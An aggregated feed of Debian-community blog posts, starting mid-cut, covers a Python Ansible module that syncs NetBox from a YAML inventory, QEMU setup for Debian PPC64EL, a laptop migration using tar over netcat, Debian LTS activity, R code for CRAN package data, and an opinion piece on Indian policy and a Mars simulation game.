syslog("info", "Temp $cur_temp" . "C, set percentage to $percent");

19 September 2020

Vincent Bernat: Syncing NetBox with a custom Ansible module

The netbox.netbox collection from Ansible Galaxy provides several modules to update NetBox objects:
- name: create a device in NetBox
  netbox_device:
    netbox_url: http://netbox.local
    netbox_token: s3cret
    data:
      name: to3-p14.sfo1.example.com
      device_type: QFX5110-48S
      device_role: Compute Switch
      site: SFO1
However, if NetBox is not your source of truth, you may want to ensure it stays in sync with your configuration management database1 by removing outdated devices or IP addresses. While it should be possible to glue together a playbook with a query, a loop and some filtering to delete unwanted elements, it feels clunky, inefficient and an abuse of YAML as a programming language. A specific Ansible module solves this issue and is likely more flexible.

Notice I recommend that you read Writing a custom Ansible module as an introduction, as well as Syncing MySQL tables for a first simpler example.

Code The module has the following signature and it syncs NetBox with the content of the provided YAML file:
netbox_sync:
  source: netbox.yaml
  api: https://netbox.example.com
  token: s3cret
The synchronized objects are:
  • sites,
  • manufacturers,
  • device types,
  • device roles,
  • devices, and
  • IP addresses.
In our environment, the YAML file is generated from our configuration management database and contains a set of devices and a list of IP addresses:
devices:
  ad2-p6.sfo1.example.com:
     datacenter: sfo1
     manufacturer: Cisco
     model: Catalyst 2960G-48TC-L
     role: net_tor_oob_switch
  to1-p6.sfo1.example.com:
     datacenter: sfo1
     manufacturer: Juniper
     model: QFX5110-48S
     role: net_tor_gpu_switch
# [ ]
ips:
  - device: ad2-p6.example.com
    ip: 172.31.115.18/21
    interface: oob
  - device: to1-p6.example.com
    ip: 172.31.115.33/21
    interface: oob
  - device: to1-p6.example.com
    ip: 172.31.254.33/32
    interface: lo0.0
# [ ]
The network team is not the sole tenant in NetBox. While adding new objects or modifying existing ones should be relatively safe, deleting unwanted objects can be risky. The module only deletes objects it did create or modify. To identify them, it marks them with a specific tag, cmdb. Most objects in NetBox accept tags.

Module definition Starting from the skeleton described in the previous article, we define the module:
module_args = dict(
    source=dict(type='path', required=True),
    api=dict(type='str', required=True),
    token=dict(type='str', required=True, no_log=True),
    max_workers=dict(type='int', required=False, default=10)
)
result = dict(
    changed=False
)
module = AnsibleModule(
    argument_spec=module_args,
    supports_check_mode=True
)
It contains an additional optional arguments defining the number of workers to talk to NetBox and query the existing objects in parallel to speedup the execution.

Abstracting synchronization We need to synchronize different object types, but once we have a list of objects we want in NetBox, the grunt work is always the same:
  • check if the objects already exist,
  • retrieve them and put them in a form suitable for comparison,
  • retrieve the extra objects we don t want anymore,
  • compare the two sets, and
  • add missing objects, update existing ones, delete extra ones.
We code these behaviours into a Synchronizer abstract class. For each kind of object, a concrete class is built with the appropriate class attributes to tune its behaviour and a wanted() method to provide the objects we want. I am not explaining the abstract class code here. Have a look at the source if you want.

Synchronizing tags and tenants As a starter, here is how we define the class synchronizing the tags:
class SyncTags(Synchronizer):
    app = "extras"
    table = "tags"
    key = "name"
    def wanted(self):
        return  "cmdb": dict(
            slug="cmdb",
            color="8bc34a",
            description="synced by network CMDB") 
The app and table attributes defines the NetBox objects we want to manipulate. The key attribute is used to determine how to lookup for existing objects. In this example, we want to lookup tags using their names. The wanted() method is expected to return a dictionary mapping object keys to the list of wanted attributes. Here, the keys are tag names and we create only one tag, cmdb, with the provided slug, color and description. This is the tag we will use to mark the objects we create or modify. If the tag does not exist, it is created. If it exists, the provided attributes are updated. Other attributes are left untouched. We also want to create a specific tenant for objects accepting such an attribute (devices and IP addresses):
class SyncTenants(Synchronizer):
    app = "tenancy"
    table = "tenants"
    key = "name"
    def wanted(self):
        return  "Network": dict(slug="network",
                                description="Network team") 

Synchronizing sites We also need to synchronize the list of sites. This time, the wanted() method uses the information provided in the YAML file: it walks the devices and builds a set of datacenter names.
class SyncSites(Synchronizer):
    app = "dcim"
    table = "sites"
    key = "name"
    only_on_create = ("status", "slug")
    def wanted(self):
        result = set(details["datacenter"]
                     for details in self.source['devices'].values()
                     if "datacenter" in details)
        return  k: dict(slug=k,
                        status="planned")
                for k in result 
Thanks to the use of the only_on_create attribute, the specified attributes are not updated if they are different. The goal of this synchronizer is mostly to collect the references to the different sites for other objects.
>>> pprint(SyncSites(**sync_args).wanted())
 'sfo1':  'slug': 'sfo1', 'status': 'planned' ,
 'chi1':  'slug': 'chi1', 'status': 'planned' ,
 'nyc1':  'slug': 'nyc1', 'status': 'planned' 

Synchronizing manufacturers, device types and device roles The synchronization of manufacturers is pretty similar, except we do not use the only_on_create attribute:
class SyncManufacturers(Synchronizer):
    app = "dcim"
    table = "manufacturers"
    key = "name"
    def wanted(self):
        result = set(details["manufacturer"]
                     for details in self.source['devices'].values()
                     if "manufacturer" in details)
        return  k:  "slug": slugify(k) 
                for k in result 
Regarding the device types, we use the foreign attribute linking a NetBox attribute to the synchronizer handling it.
class SyncDeviceTypes(Synchronizer):
    app = "dcim"
    table = "device_types"
    key = "model"
    foreign =  "manufacturer": SyncManufacturers 
    def wanted(self):
        result = set((details["manufacturer"], details["model"])
                     for details in self.source['devices'].values()
                     if "model" in details)
        return  k[1]: dict(manufacturer=k[0],
                           slug=slugify(k[1]))
                for k in result 
The wanted() method refers to the manufacturer using its key attribute. In this case, this is the manufacturer name.
>>> pprint(SyncManufacturers(**sync_args).wanted())
 'Cisco':  'slug': 'cisco' ,
 'Dell':  'slug': 'dell' ,
 'Juniper':  'slug': 'juniper' 
>>> pprint(SyncDeviceTypes(**sync_args).wanted())
 'ASR 9001':  'manufacturer': 'Cisco', 'slug': 'asr-9001' ,
 'Catalyst 2960G-48TC-L':  'manufacturer': 'Cisco',
                           'slug': 'catalyst-2960g-48tc-l' ,
 'MX10003':  'manufacturer': 'Juniper', 'slug': 'mx10003' ,
 'QFX10002-36Q':  'manufacturer': 'Juniper', 'slug': 'qfx10002-36q' ,
 'QFX10002-72Q':  'manufacturer': 'Juniper', 'slug': 'qfx10002-72q' ,
 'QFX5110-32Q':  'manufacturer': 'Juniper', 'slug': 'qfx5110-32q' ,
 'QFX5110-48S':  'manufacturer': 'Juniper', 'slug': 'qfx5110-48s' ,
 'QFX5200-32C':  'manufacturer': 'Juniper', 'slug': 'qfx5200-32c' ,
 'S4048-ON':  'manufacturer': 'Dell', 'slug': 's4048-on' ,
 'S6010-ON':  'manufacturer': 'Dell', 'slug': 's6010-on' 
The device roles are defined like this:
class SyncDeviceRoles(Synchronizer):
    app = "dcim"
    table = "device_roles"
    key = "name"
    def wanted(self):
        result = set(details["role"]
                     for details in self.source['devices'].values()
                     if "role" in details)
        return  k: dict(slug=slugify(k),
                        color="8bc34a")
                for k in result 

Synchronizing devices A device is mostly a name with references to a role, a model, a datacenter and a tenant. These references are declared as foreign keys using the synchronizers defined previously.
class SyncDevices(Synchronizer):
    app = "dcim"
    table = "devices"
    key = "name"
    foreign =  "device_role": SyncDeviceRoles,
               "device_type": SyncDeviceTypes,
               "site": SyncSites,
               "tenant": SyncTenants 
    remove_unused = 10
    def wanted(self):
        return  name: dict(device_role=details["role"],
                           device_type=details["model"],
                           site=details["datacenter"],
                           tenant="Network")
                for name, details in self.source['devices'].items()
                if  "datacenter", "model", "role"  <= set(details.keys()) 
The remove_unused attribute is a safety implemented to fail if we have to delete more than 10 devices: this may be the indication there is a bug somewhere, unless one of your datacenter suddenly caught fire.
>>> pprint(SyncDevices(**sync_args).wanted())
 'ad2-p6.sfo1.example.com':  'device_role': 'net_tor_oob_switch',
                             'device_type': 'Catalyst 2960G-48TC-L',
                             'site': 'sfo1',
                             'tenant': 'Network' ,
 'to1-p6.sfo1.example.com':  'device_role': 'net_tor_gpu_switch',
                             'device_type': 'QFX5110-48S',
                             'site': 'sfo1',
                             'tenant': 'Network' ,
[ ]

Synchronizing IP addresses The last step is to synchronize IP addresses. We do not attach them to a device.2 Instead, we specify the device names in the description of the IP address:
class SyncIPs(Synchronizer):
    app = "ipam"
    table = "ip-addresses"
    key = "address"
    foreign =  "tenant": SyncTenants 
    remove_unused = 1000
    def wanted(self):
        wanted =  
        for details in self.source['ips']:
            if details['ip'] in wanted:
                wanted[details['ip']]['description'] = \
                    f" details['device']  (and others)"
            else:
                wanted[details['ip']] = dict(
                    tenant="Network",
                    status="active",
                    dns_name="",        # information is present in DNS
                    description=f" details['device'] :  details['interface'] ",
                    role=None,
                    vrf=None)
        return wanted
There is a slight difficulty: NetBox allows duplicate IP addresses, so a simple lookup is not enough. In case of multiple matches, we choose the best by preferring those tagged with cmdb, then those already attached to an interface:
def get(self, key):
    """Grab IP address from NetBox."""
    # There may be duplicate. We need to grab the "best".
    results = super(Synchronizer, self).get(key)
    if len(results) == 0:
        return None
    if len(results) == 1:
        return results[0]
    scores = [0]*len(results)
    for idx, result in enumerate(results):
        if "cmdb" in result.tags:
            scores[idx] += 10
        if result.interface is not None:
            scores[idx] += 5
    return sorted(zip(scores, results),
                  reverse=True, key=lambda k: k[0])[0][1]

Getting the current and wanted states Each synchronizer is initialized with a reference to the Ansible module, a reference to a pynetbox s API object, the data contained in the provided YAML file and two empty dictionaries for the current and expected states:
source = yaml.safe_load(open(module.params['source']))
netbox = pynetbox.api(module.params['api'],
                      token=module.params['token'])
sync_args = dict(
    module=module,
    netbox=netbox,
    source=source,
    before= ,
    after= 
)
synchronizers = [synchronizer(**sync_args) for synchronizer in [
    SyncTags,
    SyncTenants,
    SyncSites,
    SyncManufacturers,
    SyncDeviceTypes,
    SyncDeviceRoles,
    SyncDevices,
    SyncIPs
]]
Each synchronizer has a prepare() method whose goal is to compute the current and wanted states. It returns True in case of a difference:
# Check what needs to be synchronized
try:
    for synchronizer in synchronizers:
        result['changed']  = synchronizer.prepare()
except AnsibleError as e:
    result['msg'] = e.message
    module.fail_json(**result)

Applying changes Back to the skeleton described in the previous article, the last step is to apply the changes if there is a difference between these states. Each synchronizer registers the current and wanted states in sync_args["before"][table] and sync_args["after"][table] where table is the name of the table for a given NetBox object type. The diff object is a bit elaborate as it is built table by table. This enables Ansible to display the name of each table before the diff representation:
# Compute the diff
if module._diff and result['changed']:
    result['diff'] = [
        dict(
            before_header=table,
            after_header=table,
            before=yaml.safe_dump(sync_args["before"][table]),
            after=yaml.safe_dump(sync_args["after"][table]))
        for table in sync_args["after"]
        if sync_args["before"][table] != sync_args["after"][table]
    ]
# Stop here if check mode is enabled or if no change
if module.check_mode or not result['changed']:
    module.exit_json(**result)
Each synchronizer also exposes a synchronize() method to apply changes and a cleanup() method to delete unwanted objects. Order is important due to the relation between the objects.
# Synchronize
for synchronizer in synchronizers:
    synchronizer.synchronize()
for synchronizer in synchronizers[::-1]:
    synchronizer.cleanup()
module.exit_json(**result)

The complete code is available on GitHub. Compared to using netbox.netbox collection, the logic is written in Python instead of trying to glue Ansible tasks together. I believe this is both more flexible and easier to read, notably when trying to delete outdated objects. While I did not test it, it should also be faster. An alternative would have been to reuse code from the netbox.netbox collection, as it contains similar primitives. Unfortunately, I didn t think of it until now.

  1. In my opinion, a good option for a source of truth is to use YAML files in a Git repository. You get versioning for free and people can get started with a text editor.
  2. This limitation is mostly due to laziness: we do not really care about this information. Our main motivation for putting IP addresses in NetBox is to keep track of the used IP addresses. However, if an IP address is already attached to an interface, we leave this association untouched.

14 July 2020

Russell Coker: Debian PPC64EL Emulation

In my post on Debian S390X Emulation [1] I mentioned having problems booting a Debian PPC64EL kernel under QEMU. Giovanni commented that they had PPC64EL working and gave a link to their site with Debian QEMU images for various architectures [2]. I tried their image which worked then tried mine again which also worked it seemed that a recent update in Debian/Unstable fixed the bug that made QEMU not work with the PPC64EL kernel. Here are the instructions on how to do it. First you need to create a filesystem in an an image file with commands like the following:
truncate -s 4g /vmstore/ppc
mkfs.ext4 /vmstore/ppc
mount -o loop /vmstore/ppc /mnt/tmp
Then visit the Debian Netinst page [3] to download the PPC64EL net install ISO. Then loopback mount it somewhere convenient like /mnt/tmp2. The package qemu-system-ppc has the program for emulating a PPC64LE system, the qemu-user-static package has the program for emulating PPC64LE for a single program (IE a statically linked program or a chroot environment), you need this to run debootstrap. The following commands should be most of what you need.
apt install qemu-system-ppc qemu-user-static
update-binfmts --display
# qemu ppc64 needs exec stack to solve "Could not allocate dynamic translator buffer"
# so enable that on SE Linux systems
setsebool -P allow_execstack 1
debootstrap --foreign --arch=ppc64el --no-check-gpg buster /mnt/tmp file:///mnt/tmp2
chroot /mnt/tmp /debootstrap/debootstrap --second-stage
cat << END > /mnt/tmp/etc/apt/sources.list
deb http://mirror.internode.on.net/pub/debian/ buster main
deb http://security.debian.org/ buster/updates main
END
echo "APT::Install-Recommends False;" > /mnt/tmp/etc/apt/apt.conf
echo ppc64 > /mnt/tmp/etc/hostname
# /usr/bin/awk: error while loading shared libraries: cannot restore segment prot after reloc: Permission denied
# only needed for chroot
setsebool allow_execmod 1
chroot /mnt/tmp apt update
# why aren't they in the default install?
chroot /mnt/tmp apt install perl dialog
chroot /mnt/tmp apt dist-upgrade
chroot /mnt/tmp apt install bash-completion locales man-db openssh-server build-essential systemd-sysv ifupdown vim ca-certificates gnupg
# install kernel last because systemd install rebuilds initrd
chroot /mnt/tmp apt install linux-image-ppc64el
chroot /mnt/tmp dpkg-reconfigure locales
chroot /mnt/tmp passwd
cat << END > /mnt/tmp/etc/fstab
/dev/vda / ext4 noatime 0 0
#/dev/vdb none swap defaults 0 0
END
mkdir /mnt/tmp/root/.ssh
chmod 700 /mnt/tmp/root/.ssh
cp ~/.ssh/id_rsa.pub /mnt/tmp/root/.ssh/authorized_keys
chmod 600 /mnt/tmp/root/.ssh/authorized_keys
rm /mnt/tmp/vmlinux* /mnt/tmp/initrd*
mkdir /boot/ppc64
cp /mnt/tmp/boot/[vi]* /boot/ppc64
# clean up
umount /mnt/tmp
umount /mnt/tmp2
# setcap binary for starting bridged networking
setcap cap_net_admin+ep /usr/lib/qemu/qemu-bridge-helper
# afterwards set the access on /etc/qemu/bridge.conf so it can only
# be read by the user/group permitted to start qemu/kvm
echo "allow all" > /etc/qemu/bridge.conf
Here is an example script for starting kvm. It can be run by any user that can read /etc/qemu/bridge.conf.
#!/bin/bash
set -e
KERN="kernel /boot/ppc64/vmlinux-4.19.0-9-powerpc64le -initrd /boot/ppc64/initrd.img-4.19.0-9-powerpc64le"
# single network device, can have multiple
NET="-device e1000,netdev=net0,mac=02:02:00:00:01:04 -netdev tap,id=net0,helper=/usr/lib/qemu/qemu-bridge-helper"
# random number generator for fast start of sshd etc
RNG="-object rng-random,filename=/dev/urandom,id=rng0 -device virtio-rng-pci,rng=rng0"
# I have lockdown because it does no harm now and is good for future kernels
# I enable SE Linux everywhere
KERNCMD="net.ifnames=0 noresume security=selinux root=/dev/vda ro lockdown=confidentiality"
kvm -drive format=raw,file=/vmstore/ppc64,if=virtio $RNG -nographic -m 1024 -smp 2 $KERN -curses -append "$KERNCMD" $NET

9 July 2020

Enrico Zini: Laptop migration

This laptop used to be extra-flat My laptop battery started to explode in slow motion. HP requires 10 business days to repair my laptop under warranty, and I cannot afford that length of downtime. Alternatively, HP quoted me 375 + VAT for on-site repairs, which I tought was very funny. For 376.55 + VAT, which is pretty much exactly the same amount, I bought instead a refurbished ThinkPad X240 with a dual-core I5, 8G of RAM, 250G SSD, and a 1920x1080 IPS display, to use as a spare while my laptop is being repaired. I'd like to thank HP for giving me the opportunity to own a ThinkPad. Since I'm migrating all my system to the spare and then (hopefully) back, I'm documenting what I need to be fully productive on new hardware. Install Debian A basic Debian netinst with no tasks selected is good enough to get going. Note that if wifi worked in Debian Installer, it doesn't mean that it will work in the minimal system it installed. See here for instructions on quickly bringing up wifi on a newly installed minimal system. Copy /home A simple tar of /home is all I needed to copy my data over. A neat way to do it was connecting the two laptops with an ethernet cable, and using netcat:
# On the source
tar -C / -zcf - home   nc -l -p 12345 -N
# On the target
nc 10.0.0.1 12345   tar -C / -zxf -
Since the data travel unencrypted in this way, don't do it over wifi. Install packages I maintain a few simple local metapackages that depend on the packages I usually used. I could just install those and let apt bring in their dependencies. For the build dependencies of the programs I develop, I use mk-build-deps from the devscripts package to create metapackages that make sure they are installed. Here's an extract from debian/control of the metapackage:
Source: enrico
Section: admin
Priority: optional
Maintainer: Enrico Zini <enrico@debian.org>
Build-Depends: debhelper (>= 11)
Standards-Version: 3.7.2.1
Package: enrico
Section: admin
Architecture: all
Depends:
  mc, mmv, moreutils, powertop, syncmaildir, notmuch,
  ncdu, vcsh, ddate, jq, git-annex, eatmydata,
  vdirsyncer, khal, etckeeper, moc, pwgen
Description: Enrico's working environment
Package: enrico-devel
Section: devel
Architecture: all
Depends:
  git, python3-git, git-svn, gitk, ansible, fabric,
  valgrind, kcachegrind, zeal, meld, d-feet, flake8, mypy, ipython3,
  strace, ltrace
Description: Enrico's development environment
Package: enrico-gui
Section: x11
Architecture: all
Depends:
  xclip, gnome-terminal, qalculate-gtk, liferea, gajim,
  mumble, sm, syncthing, virt-manager
Recommends: k3b
Description: Enrico's GUI environment
Package: enrico-sanity
Section: admin
Architecture: all
Conflicts: libapache2-mod-php, libapache2-mod-php5, php5, php5-cgi, php5-fpm, libapache2-mod-php7.0, php7.0, libphp7.0-embed, libphp-embed, libphp5-embed
Description: Enrico's sanity
 Metapackage with a list of packages that I do not want anywhere near my
 system.
System-wide customizations I tend to avoid changing system-wide configuration as much as possible, so copying over /home and installing packages takes care of 99% of my needs. There are a few system-wide tweaks I cannot do without: For postfix, I have a little ansible playbook that takes care of it. Network Manager system connections need to be copied manually: a plain copy and a systemctl restart network-manager are enough. Note that Network Manager will ignore the files unless their owner and permissions are what it expects. Fine tuning Comparing the output of dpkg --get-selections between the old and the new system might highlight packages manually installed in a hurry and not added to the metapackages. Finally, what remains is fixing the sad state of mimetype associations, which seem to associate opening file depending on whatever application was installed last, phases of the moon, and what option is the most annoying. Currently on my system, PDFs are opened in inkscape by xdg-open and in calibre by run-mailcap. Let's see how long it takes to figure this one out.

9 May 2020

Thorsten Alteholz: My Debian Activities in April 2020

FTP master This month I accepted 384 packages and rejected 47. The overall number of packages that got accepted was 457. Debian LTS This was my seventieth month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. This month my all in all workload has been 28.75h. During that time I did LTS uploads of: As there have been lots of no-dsa-CVEs I continued my work on wireshark. Last but not least I did some days of frontdesk duties. Debian ELTS This month was the twenty second ELTS month. During my small allocated time I only uploaded: I also did some days of frontdesk duties. Other stuff Unfortunately this month again strange things happened outside Debian and I only got some stuff done. I improved packaging of I sponsored uploads of I uploaded the new package On my Go challenge I uploaded:
golang-github-facebookgo-subset, golang-github-facebookgo-ensure, golang-github-shurcool-gopherjslib, golang-github-grafana-grafana-plugin-model, golang-github-crewjam-httperr, golang-github-hashicorp-terraform-svchost, golang-github-neelance-sourcemap, golang-github-neelance-astrewrite, golang-github-kisielk-gotool, golang-github-gopherjs-gopherjs, golang-github-yvasiyarov-newrelic-platform-go, golang-github-rhnvrm-simples3, golang-github-robfig-go-cache, golang-github-xorcare-pointer, golang-github-goburrow-serial

15 April 2017

Dirk Eddelbuettel: #5: Easy package information

Welcome to the fifth post in the recklessly rambling R rants series, or R4 for short. The third post showed an easy way to follow R development by monitoring (curated) changes on the NEWS file for the development version r-devel. As a concrete example, I mentioned that it has shown a nice new function (tools::CRAN_package_db()) coming up in R 3.4.0. Today we will build on that. Consider the following short snippet:
library(data.table)
getPkgInfo <- function()  
    if (exists("tools::CRAN_package_db"))  
        dat <- tools::CRAN_package_db()
      else  
        tf <- tempfile()
        download.file("https://cloud.r-project.org/src/contrib/PACKAGES.rds", tf, quiet=TRUE)
        dat <- readRDS(tf)              # r-devel can now readRDS off a URL too
     
    dat <- as.data.frame(dat)
    setDT(dat)
    dat
 
It defines a simple function getPkgInfo() as a wrapper around said new function from R 3.4.0, ie tools::CRAN_package_db(), and a fallback alternative using a tempfile (in the automagically cleaned R temp directory) and an explicit download and read of the underlying RDS file. As an aside, just this week the r-devel NEWS told us that such readRDS() operations can now read directly from URL connection. Very nice---as RDS is a fantastic file format when you are working in R. Anyway, back to the RDS file! The snippet above returns a data.table object with as many rows as there are packages on CRAN, and basically all their (parsed !!) DESCRIPTION info and then some. A gold mine! Consider this to see how many package have a dependency (in the sense of Depends, Imports or LinkingTo, but not Suggests because Suggests != Depends) on Rcpp:
R> dat <- getPkgInfo()
R> rcppRevDepInd <- as.integer(tools::dependsOnPkgs("Rcpp", recursive=FALSE, installed=dat))
R> length(rcppRevDepInd)
[1] 998
R>
So exciting---we will hit 1000 within days! But let's do some more analysis:
R> dat[ rcppRevDepInd, RcppRevDep := TRUE]  # set to TRUE for given set
R> dat[ RcppRevDep==TRUE, 1:2]
           Package Version
  1:      ABCoptim  0.14.0
  2: AbsFilterGSEA     1.5
  3:           acc   1.3.3
  4: accelerometry   2.2.5
  5:      acebayes   1.3.4
 ---                      
994:        yakmoR   0.1.1
995:  yCrypticRNAs  0.99.2
996:         yuima   1.5.9
997:           zic     0.9
998:       ziphsmm   1.0.4
R>
Here we index the reverse dependency using the vector we had just computed, and then that new variable to subset the data.table object. Given the aforementioned parsed information from all the DESCRIPTION files, we can learn more:
R> ## likely false entries
R> dat[ RcppRevDep==TRUE, ][NeedsCompilation!="yes", c(1:2,4)]
            Package Version                                                                         Depends
 1:         baitmet   1.0.0                                                           Rcpp, erah (>= 1.0.5)
 2:           bea.R   1.0.1                                                        R (>= 3.2.1), data.table
 3:            brms   1.6.0                     R (>= 3.2.0), Rcpp (>= 0.12.0), ggplot2 (>= 2.0.0), methods
 4: classifierplots   1.3.3                             R (>= 3.1), ggplot2 (>= 2.2), data.table (>= 1.10),
 5:           ctsem   2.3.1                                           R (>= 3.2.0), OpenMx (>= 2.3.0), Rcpp
 6:        DeLorean   1.2.4                                                  R (>= 3.0.2), Rcpp (>= 0.12.0)
 7:            erah   1.0.5                                                               R (>= 2.10), Rcpp
 8:             GxM     1.1                                                                              NA
 9:             hmi   0.6.3                                                                    R (>= 3.0.0)
10:        humarray     1.1 R (>= 3.2), NCmisc (>= 1.1.4), IRanges (>= 1.22.10),\nGenomicRanges (>= 1.16.4)
11:         iNextPD   0.3.2                                                                    R (>= 3.1.2)
12:          joinXL   1.0.1                                                                    R (>= 3.3.1)
13:            mafs   0.0.2                                                                              NA
14:            mlxR   3.1.0                                                           R (>= 3.0.1), ggplot2
15:    RmixmodCombi     1.0              R(>= 3.0.2), Rmixmod(>= 2.0.1), Rcpp(>= 0.8.0), methods,\ngraphics
16:             rrr   1.0.0                                                                    R (>= 3.2.0)
17:        UncerIn2     2.0                          R (>= 3.0.0), sp, RandomFields, automap, fields, gstat
R> 
There are a full seventeen packages which claim to depend on Rcpp while not having any compiled code of their own. That is likely false---but I keep them in my counts, however relunctantly. A CRAN-declared Depends: is a Depends:, after all. Another nice thing to look at is the total number of package that declare that they need compilation:
R> ## number of packages with compiled code
R> dat[ , .(N=.N), by=NeedsCompilation]
   NeedsCompilation    N
1:               no 7625
2:              yes 2832
3:               No    1
R>
Isn't that awesome? It is 2832 out of (currently) 10458, or about 27.1%. Just over one in four. Now the 998 for Rcpp look even better as they are about 35% of all such packages. In order words, a little over one third of all packages with compiled code (which may be legacy C, Fortran or C++) use Rcpp. Wow. Before closing, one shoutout to Dirk Schumacher whose thankr which I made the center of the last post is now on CRAN. As a mighty fine and slim micropackage without external dependencies. Neat.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

30 January 2017

Shirish Agarwal: Different strokes

Delhi Metro - courtesy wikipedia.org Statutory warning It s a long read. I start by sharing I regret, I did not hold onto the Budget and Economics 101 blog post for one more day. I had been holding/thinking on to it for almost couple of weeks before posting, if I had just waited a day more, I would have been able to share an Indian Express story . While I thought that the work for the budget starts around 3 months before the budget, I came to learn from that article that it takes 6 months. As can be seen in the article, it is somewhat of a wasted opportunity, part of it probably due to the Government (irrespective of any political party, dynasty etc.) mismanagement. What has not been stated in the article is what I had shared earlier, reading between the lines, it seems that the Government isn t able to trust what it hears from its advisers and man on the street. Unlike Chanakya and many wise people before him who are credited with advising about good governance, that a good king is one who goes out in disguise, learns how his/er subjects are surviving, seeing what ills them and taking or even not taking corrective steps after seeing the problem from various angles. Of course it s easier said then done, though lot of Indian kings did try and ran successful provinces. There were also some who were more interested in gambling, women and threw/frittered away their kingdoms. The 6-month things while not being said in the Express article is probably more about checking and re-checking figures and sources to make sure they are able to read whatever pattern the various Big Businesses, Industry, Social Welfare schemes and people are saying I guess. And unless mass digitalization as well as overhaul of procedures, Right to Information (RTI) happens, don t see any improvement in the way the information is collected, interpreted and shared with the public at large. It would also require people who are able to figure out how things work sharing the inferences (right or wrong) through various media so there is discussion about figures and policy-making. Such researchers and their findings are sadly missing in Indian public discourses and only found in glossy coffee table books :(. One of the most basic question for instance is, How much of any policy should be based on facts and figures and how much giving fillip to products and services needed in short to medium term ? Also how much morality should play a part in Public Policy ? Surprisingly, or probably not, most Indian budgets are populist by nature with some scientific basis but most of the times there is no dialog about how the FM came to some conclusion or Policy-making. I am guessing a huge part of that has also to do with basic illiteracy as well as Economic and Financial Illiteracy. Just to share a well-known world-over example, one of the policies where the Government of India has been somewhat lethargic is wired broadband penetration. As have shared umpteen times, while superficially broadband penetration is happening, most of the penetration is the unreliable and more expensive mobile broadband penetration. While this may come as a shock to many of the users of technology, BSNL, a Government company who provides broadband for almost 70-80% of the ADSL wired broadband subscribers gives 50:1 contention ratio to its customers. One can now understand the pathetic speeds along with very old copper wiring (20 odd years) on which the network is running. The idea/idiom of running network using duct-tape seems pretty apt in here  Now, the Government couple of years ago introduced FFTH Fiber-to-the-home but because the charges are so high, it s not going anywhere. The Government could say 10% discount in your Income Tax rates if you get FFTH. This would force people to get FFTH and would also force BSNL to clean up its act. It has been documented that a percentage increase in broadband equals a similar percentage rise in GDP. Having higher speeds of broadband would mean better quality of streaming video as well as all sorts of remote teaching and sharing of ideas which will give a lot of fillip to all sorts of IT peripherals in short, medium and long-term as well. Not to mention, all the software that will be invented/coded to take benefit of all that speed. Although, realistically speaking I am cynical that the Government would bring something like this  Moving on Behind a truck - Courtesy TheEconomist.com Another interesting story which I had shared was a bit about World History Now the Economist sort of confirmed how things are in Pakistan. What is and was interesting that the article is made by a politically left-leaning magazine which is for globalization, business among other things . So, there seem to be only three options, either I and the magazine are correct or we both are reading it wrong. The third and last option is that the United States realize that Pakistan can no longer be trusted as Pakistan is siding more and more with Chinese and Russians, hence the article. Atlhough it seems a somewhat far-fetched idea as I don t see the magazine getting any brownie points with President Trump. Unless, The Economist becomes more hawkish, more right-wingish due to the new establishment. I can t claim to have any major political understanding or expertise but it does seem that Pakistan is losing friends. Even UAE have been cautiously building bridges with us. Now how this will play out in the medium to long-term depends much on the personal equations of the two heads of state, happenings in geopolitics around the world and the two countries, decisions they take, it is a welcome opportunity as far they (the Saudis) have funds they want to invest and India can use those investments to make new infrastructure. Now, I need a bit of help of Java and VCS (Version control system) experts . There is a small game project called Mars-Sim. I asked probably a few more questions than I should have and the result was that I was made a member of the game team even though I had shared with them that I m a non-coder. I think such a game is important as it s foss. Both the game itself is foss as well as its build-tools with a basic wiki. Such a game would be useful not only to Debian but all free software distributions. Journeying into the game Unfortunately, the game as it is currently, doesn t work with openjdk8 but private conversations with the devs. have shared they will work on getting it to work on OpenJDK 9 which though is sometime away. Now as it is a game, I knew it would have multiple multimedia assets. It took me quite sometime to figure out where most of the multimedia assets are. I was shocked to find that there aren t any tool/s in Debian as well a GNU/Linux to know about types of content is there inside a directory and its sub-directories. I framed it in a query and found a script as an answer . I renamed the script to file-extension-information.sh (for lack of imagination of better name). After that, I downloaded a snapshot of the head of the project from https://sourceforge.net/p/mars-sim/code/HEAD/tree/ where it shows a link to download the snapshot. https://sourceforge.net/code-snapshots/svn/m/ma/mars-sim/code/mars-sim-code-3847-trunk.zip unzipped it and then ran the script on it [$] bash file-extension-information.sh mars-sim-code-3846-trunk
theme: 1770
dtd: 31915
py: 10815
project: 5627
JPG: 762476
fxml: 59490
vm: 876
dat: 15841044
java: 13052271
store: 1343
gitignore: 8
jpg: 3473416
md: 5156
lua: 57
gz: 1447
desktop: 281
wav: 83278
1: 2340
css: 323739
frag: 471
svg: 8948591
launch: 9404
index: 11520
iml: 27186
png: 3268773
json: 1217
ttf: 2861016
vert: 712
ogg: 12394801
prefs: 11541
properties: 186731
gradle: 611
classpath: 8538
pro: 687
groovy: 2711
form: 5780
txt: 50274
xml: 794365
js: 1465072
dll: 2268672
html: 1676452
gif: 38399
sum: 23040
(none): 1124
jsx: 32070
It gave me some idea of what sort of file were under the repository. I do wish the script defaulted to showing file-sizes in KB if not MB to better assess how the directory is made up but not a big loss . The above listing told me that at the very least theme, JPG, dat, wav, png, ogg and lastly gif files. For lack of better tools and to get an overview of where those multimedia assets used ncdu [shirish@debian] - [~/games/mars-sim-code-3846-trunk] - [10210]
[$] ncdu mars-sim/
--- /home/shirish/games/mars-sim-code-3846-trunk/mars-sim --------------------------------------------------------------------------------------
46.2 MiB [##########] /mars-sim-ui
15.2 MiB [### ] /mars-sim-mapdata
8.3 MiB [# ] /mars-sim-core
2.1 MiB [ ] /mars-sim-service
500.0 KiB [ ] /mars-sim-main
188.0 KiB [ ] /mars-sim-android
72.0 KiB [ ] /mars-sim-network
16.0 KiB [ ] pom.xml
12.0 KiB [ ] /.settings
4.0 KiB [ ] mars-sim.store
4.0 KiB [ ] mars-sim.iml
4.0 KiB [ ] .project
